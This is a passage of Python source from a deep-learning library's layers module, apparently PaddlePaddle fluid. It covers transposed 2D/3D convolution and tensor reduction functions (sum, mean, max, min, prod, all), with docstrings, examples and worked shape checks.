data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d_transpose = fluid.layers.conv2d_transpose(input=data, num_filters=2, filter_size=3)
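
        For the example above (stride 1, padding 0, dilation 1, filter_size 3),
        the output-size formula gives the following (a worked check only, not
        library code):

        .. code-block:: python

            H_in, stride, pad_top, pad_bottom, dilation, H_f = 32, 1, 0, 0, 1, 3
            H_out = (H_in - 1) * stride - pad_top - pad_bottom + dilation * (H_f - 1) + 1
            print(H_out)  # 34, so the example output shape is [None, 2, 34, 34]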
"""
assert param_attr is not False, "param_attr should not be False in conv2d_transpose."
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(fluid.layers.conv2d_transpose) got wrong value: received "
+ data_format + " but only NCHW or NHWC supported.")
input_channel = input.shape[1] if data_format == 'NCHW' else input.shape[-1]
op_type = 'conv2d_transpose'
if (input_channel == groups and num_filters == input_channel and
not use_cudnn):
op_type = 'depthwise_conv2d_transpose'
helper = LayerHelper(op_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv2d_transpose must be Variable")
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
else:
padding = utils.convert_to_list(padding, 2, 'padding')
padding = [padding[0], padding[0], padding[1], padding[1]]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size]
h_in = input.shape[2] if data_format == 'NCHW' else input.shape[1]
w_in = input.shape[3] if data_format == 'NCHW' else input.shape[2]
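        # Invert the transposed-convolution output-size formula above to infer
        # the kernel size from the requested output_size; `padding` here is the
        # 4-element [top, bottom, left, right] list produced by _update_padding.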
filter_size_h = (output_size[0] - (h_in - 1) * stride[0] + padding[0] +
padding[1] - 1) // dilation[0] + 1
filter_size_w = (output_size[1] - (w_in - 1) * stride[1] + padding[2] +
padding[3] - 1) // dilation[1] + 1
filter_size = [filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(filter_size, 2,
'conv2d_transpose.filter_size')
if len(padding) == 4 and utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr)
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'Input': [input],
'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
out = helper.append_activation(pre_act)
return out
def conv3d_transpose(input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCDHW'):
"""
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW or NDHWC format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a Tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a Tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D^\prime_{out} &= (D_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (D_f - 1) + 1 \\\\
H^\prime_{out} &= (H_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (H_f - 1) + 1 \\\\
W^\prime_{out} &= (W_{in} - 1) * strides[2] - 2 * paddings[2] + dilations[2] * (W_f - 1) + 1 \\\\
D_{out} &\in [ D^\prime_{out}, D^\prime_{out} + strides[0] ] \\\\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[1] ] \\\\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[2] ]
Note:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
        when stride > 1, conv3d maps multiple input shapes to the same output shape,
        so for conv3d_transpose, when stride > 1, one input shape maps to multiple output shapes.
        If output_size is None, :math:`D_{out} = D^\prime_{out}, H_{out} = H^\prime_{out}, W_{out} = W^\prime_{out}`;
        else, the :math:`D_{out}` of the output
        size must be between :math:`D^\prime_{out}` and :math:`D^\prime_{out} + strides[0]`,
        the :math:`H_{out}` of the output size must be between :math:`H^\prime_{out}`
        and :math:`H^\prime_{out} + strides[1]`, and the :math:`W_{out}` of the output size must
        be between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[2]`; in this case,
        conv3d_transpose can compute the kernel size automatically.
Args:
input(Variable): The input is 5-D Tensor with shape [N, C, D, H, W] or [N, D, H, W, C], the data type
of input is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain three integers, (image_depth, image_height, image_width). This
parameter only works when filter_size is None. If output_size and filter_size are
            specified at the same time, they should follow the formula above. Default: None.
            output_size and filter_size should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size. None if use output size to
calculate filter_size. Default: None. filter_size and output_size should not be
None at the same time.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively
adds `dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a string,
either 'VALID' or 'SAME' supported, which is the padding algorithm. If `padding`
is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `'NCDHW'`, `padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NDHWC'`, `padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain three integers, (stride_depth, stride_height,
stride_width). Otherwise, stride_depth = stride_height = stride_width = stride.
Default: stride = 1.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups(int, optional): The groups number of the Conv3d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups=1
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv3d_transpose. If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv3d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
        data_format (str, optional): Specify the data format of the input, and the data format of the output
            will be consistent with that of the input. An optional string from: `"NCDHW"`, `"NDHWC"`.
            The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
            `[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv3d_transpose, whose data
        type is the same as input and shape is (num_batches, channels, out_d, out_h,
out_w) or (num_batches, out_d, out_h, out_w, channels). If act is None, the tensor
variable storing the transposed convolution result, and if act is not None, the tensor
variable storing transposed convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
conv3d_transpose = fluid.layers.conv3d_transpose(input=data, num_filters=2, filter_size=3)
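
        For the example above (stride 1, padding 0, dilation 1, filter_size 3),
        the output-size formula gives the following (a worked check only, not
        library code):

        .. code-block:: python

            D_in, H_in, W_in, stride, pad, dilation, k = 12, 32, 32, 1, 0, 1, 3
            D_out = (D_in - 1) * stride - 2 * pad + dilation * (k - 1) + 1  # 14
            H_out = (H_in - 1) * stride - 2 * pad + dilation * (k - 1) + 1  # 34
            W_out = (W_in - 1) * stride - 2 * pad + dilation * (k - 1) + 1  # 34
            # so the example output shape is [None, 2, 14, 34, 34]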
"""
assert param_attr is not False, "param_attr should not be False in conv3d_transpose."
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Param(data_format) of Op(fluid.layers.conv3d_transpose) got wrong value: received "
+ data_format + " but only NCDHW or NDHWC supported.")
l_type = "conv3d_transpose"
helper = LayerHelper(l_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv3d_transpose must be Variable")
input_channel = input.shape[1] if data_format == 'NCDHW' else input.shape[
-1]
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
else:
padding = utils.convert_to_list(padding, 3, 'padding')
padding = [
padding[0], padding[0], padding[1], padding[1], padding[2],
padding[2]
]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size, output_size]
d_in = input.shape[2] if data_format == 'NCDHW' else input.shape[1]
h_in = input.shape[3] if data_format == 'NCDHW' else input.shape[2]
w_in = input.shape[4] if data_format == 'NCDHW' else input.shape[3]
filter_size_d = (output_size[0] - (d_in - 1) * stride[0] + padding[0] +
padding[1] - 1) // dilation[0] + 1
filter_size_h = (output_size[1] - (h_in - 1) * stride[1] + padding[2] +
padding[3] - 1) // dilation[1] + 1
filter_size_w = (output_size[2] - (w_in - 1) * stride[2] + padding[4] +
padding[5] - 1) // dilation[2] + 1
filter_size = [filter_size_d, filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(filter_size, 3,
'conv3d_transpose.filter_size')
if len(padding) == 6 and utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr)
if data_format == 'NCDHW':
data_format = 'NCHW'
if data_format == 'NDHWC':
data_format = 'NHWC'
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=l_type,
inputs={'Input': [input],
'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
out = helper.append_activation(pre_act)
return out
def reduce_sum(input, dim=None, keep_dim=False, name=None):
"""
Computes the sum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the sum is performed. If
:attr:`None`, sum all elements of :attr:`input` and return a
Tensor variable with a single element, otherwise must be in the
range :math:`[-rank(input), rank(input))`. If :math:`dim[i] < 0`,
the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of summation operation on the specified dim of input tensor,
        its data type is the same as that of the input Tensor.
Raises:
        TypeError: If the out data type is different from the input data type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_sum(x) # [3.5]
fluid.layers.reduce_sum(x, dim=0) # [0.3, 0.5, 1.1, 1.6]
fluid.layers.reduce_sum(x, dim=-1) # [1.9, 1.6]
fluid.layers.reduce_sum(x, dim=1, keep_dim=True) # [[1.9], [1.6]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1, 2], [3, 4]],
# [[5, 6], [7, 8]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_sum(y, dim=[1, 2]) # [10, 26]
fluid.layers.reduce_sum(y, dim=[0, 1]) # [16, 20]
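
        An informal NumPy comparison of the same reductions (illustrative
        only; ``np_x`` holds the same values as ``x`` above):

        .. code-block:: python

            import numpy as np
            np_x = np.array([[0.2, 0.3, 0.5, 0.9], [0.1, 0.2, 0.6, 0.7]], dtype='float32')
            np_x.sum()                       # 3.5, like reduce_sum(x)
            np_x.sum(axis=0)                 # like reduce_sum(x, dim=0)
            np_x.sum(axis=1, keepdims=True)  # like reduce_sum(x, dim=1, keep_dim=True)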
"""
if dim is not None and not isinstance(dim, list):
dim = [dim]
if in_dygraph_mode():
reduce_all = True if dim == None or dim == [] else False
dim = dim if dim != None and dim != [] else [0]
return core.ops.reduce_sum(input, 'dim', dim, 'keep_dim', keep_dim,
'reduce_all', reduce_all)
attrs = {
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
}
check_variable_and_dtype(
input, 'input', ['float32', 'float64', 'int32', 'int64'], 'reduce_sum')
helper = LayerHelper('reduce_sum', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='reduce_sum',
inputs={'X': input},
outputs={'Out': out},
attrs=attrs)
return out
def reduce_mean(input, dim=None, keep_dim=False, name=None):
"""
Computes the mean of the input tensor's elements along the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimension along which the mean is computed. If
`None`, compute the mean over all elements of :attr:`input`
and return a variable with a single element, otherwise it
must be in the range :math:`[-rank(input), rank(input))`. If
:math:`dim[i] < 0`, the dimension to reduce is
:math:`rank(input) + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of average on the specified dim of input tensor,
        its data type is the same as that of the input Tensor.
Raises:
        TypeError: If the out data type is different from the input data type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_mean(x) # [0.4375]
fluid.layers.reduce_mean(x, dim=0) # [0.15, 0.25, 0.55, 0.8]
fluid.layers.reduce_mean(x, dim=-1) # [0.475, 0.4]
fluid.layers.reduce_mean(x, dim=1, keep_dim=True) # [[0.475], [0.4]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_mean(y, dim=[1, 2]) # [2.5, 6.5]
fluid.layers.reduce_mean(y, dim=[0, 1]) # [4.0, 5.0]
"""
if dim is not None and not isinstance(dim, list):
dim = [dim]
if in_dygraph_mode():
reduce_all = True if dim == None or dim == [] else False
dim = dim if dim != None and dim != [] else [0]
return core.ops.reduce_mean(input, 'dim', dim, 'keep_dim', keep_dim,
'reduce_all', reduce_all)
attrs = {
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
}
check_variable_and_dtype(
input, 'input', ['float32', 'float64', 'int32', 'int64'], 'reduce_mean')
helper = LayerHelper('reduce_mean', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='reduce_mean',
inputs={'X': input},
outputs={'Out': out},
attrs=attrs)
return out
def reduce_max(input, dim=None, keep_dim=False, name=None):
"""
Computes the maximum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimension along which the maximum is computed.
If :attr:`None`, compute the maximum over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, results of maximum on the specified dim of input tensor,
        its data type is the same as that of the input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_max(x) # [0.9]
fluid.layers.reduce_max(x, dim=0) # [0.2, 0.3, 0.6, 0.9]
fluid.layers.reduce_max(x, dim=-1) # [0.9, 0.7]
fluid.layers.reduce_max(x, dim=1, keep_dim=True) # [[0.9], [0.7]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_max(y, dim=[1, 2]) # [4.0, 8.0]
fluid.layers.reduce_max(y, dim=[0, 1]) # [7.0, 8.0]
"""
helper = LayerHelper('reduce_max', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_max',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_min(input, dim=None, keep_dim=False, name=None):
"""
Computes the minimum of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the minimum is computed.
If :attr:`None`, compute the minimum over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, result of minimum on the specified dim of input tensor,
        its data type is the same as that of the input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_min(x) # [0.1]
fluid.layers.reduce_min(x, dim=0) # [0.1, 0.2, 0.5, 0.7]
fluid.layers.reduce_min(x, dim=-1) # [0.2, 0.1]
fluid.layers.reduce_min(x, dim=1, keep_dim=True) # [[0.2], [0.1]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_min(y, dim=[1, 2]) # [1.0, 5.0]
fluid.layers.reduce_min(y, dim=[0, 1]) # [1.0, 2.0]
"""
helper = LayerHelper('reduce_min', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_min',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_prod(input, dim=None, keep_dim=False, name=None):
"""
Computes the product of tensor elements over the given dimension.
Args:
input (Variable): The input variable which is a Tensor, the data type is float32,
float64, int32, int64.
dim (list|int, optional): The dimensions along which the product is performed. If
:attr:`None`, multiply all elements of :attr:`input` and return a
Tensor variable with a single element, otherwise must be in the
range :math:`[-rank(input), rank(input))`. If :math:`dim[i] < 0`,
the dimension to reduce is :math:`rank + dim[i]`.
keep_dim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: Tensor, result of product on the specified dim of input tensor,
        its data type is the same as that of the input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# x is a Tensor variable with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = fluid.data(name='x', shape=[2, 4], dtype='float32')
fluid.layers.reduce_prod(x) # [0.0002268]
fluid.layers.reduce_prod(x, dim=0) # [0.02, 0.06, 0.3, 0.63]
fluid.layers.reduce_prod(x, dim=-1) # [0.027, 0.0084]
fluid.layers.reduce_prod(x, dim=1,
keep_dim=True) # [[0.027], [0.0084]]
# y is a Tensor variable with shape [2, 2, 2] and elements as below:
# [[[1.0, 2.0], [3.0, 4.0]],
# [[5.0, 6.0], [7.0, 8.0]]]
# Each example is followed by the corresponding output tensor.
y = fluid.data(name='y', shape=[2, 2, 2], dtype='float32')
fluid.layers.reduce_prod(y, dim=[1, 2]) # [24.0, 1680.0]
fluid.layers.reduce_prod(y, dim=[0, 1]) # [105.0, 384.0]
"""
helper = LayerHelper('reduce_prod', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_prod',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_all(input, dim=None, keep_dim=False, name=None):
"""
This OP computes the ``logical and`` of tensor elements over the given dimension, and output the result.
Args:
input (Variable): The input variable which is a Tensor or LoDTensor, the input data type should be `bool`.
dim (list|int|optional): The dimension along which the logical and is computed.
If :attr:`None`, compute the logical and over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`. The default value is None.
keep_dim (bool): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true. The default value is False.
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically. The default value is None.
Returns:
        Variable: The reduced tensor variable with ``logical and`` in the given dims. The output data type is bool.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# x is a bool Tensor variable with following elements:
# [[True, False]
# [True, True]]
x = layers.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
x = layers.cast(x, 'bool')
out = layers.reduce_all(x) # False
out = layers.reduce_all(x, dim=0) # [True, False]
out = layers.reduce_all(x, dim=-1) # [False, True]
# keep_dim=False, x.shape=(2,2), out.shape=(2,)
out = layers.reduce_all(x, dim=1, keep_dim=True) # [[False], [True]]
# keep_dim=True, x.shape=(2,2), out.shape=(2,1)
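
        An informal NumPy comparison of the same reductions (illustrative
        only; ``np_x`` holds the same boolean values as ``x`` above):

        .. code-block:: python

            import numpy as np
            np_x = np.array([[True, False], [True, True]])
            np_x.all()                       # False, like reduce_all(x)
            np_x.all(axis=0)                 # [True, False], like reduce_all(x, dim=0)
            np_x.all(axis=1, keepdims=True)  # [[False], [True]], like dim=1, keep_dim=True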
"""
helper = LayerHelper('reduce_all', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_all',
inputs={'X': input},
outputs={'Out': out},
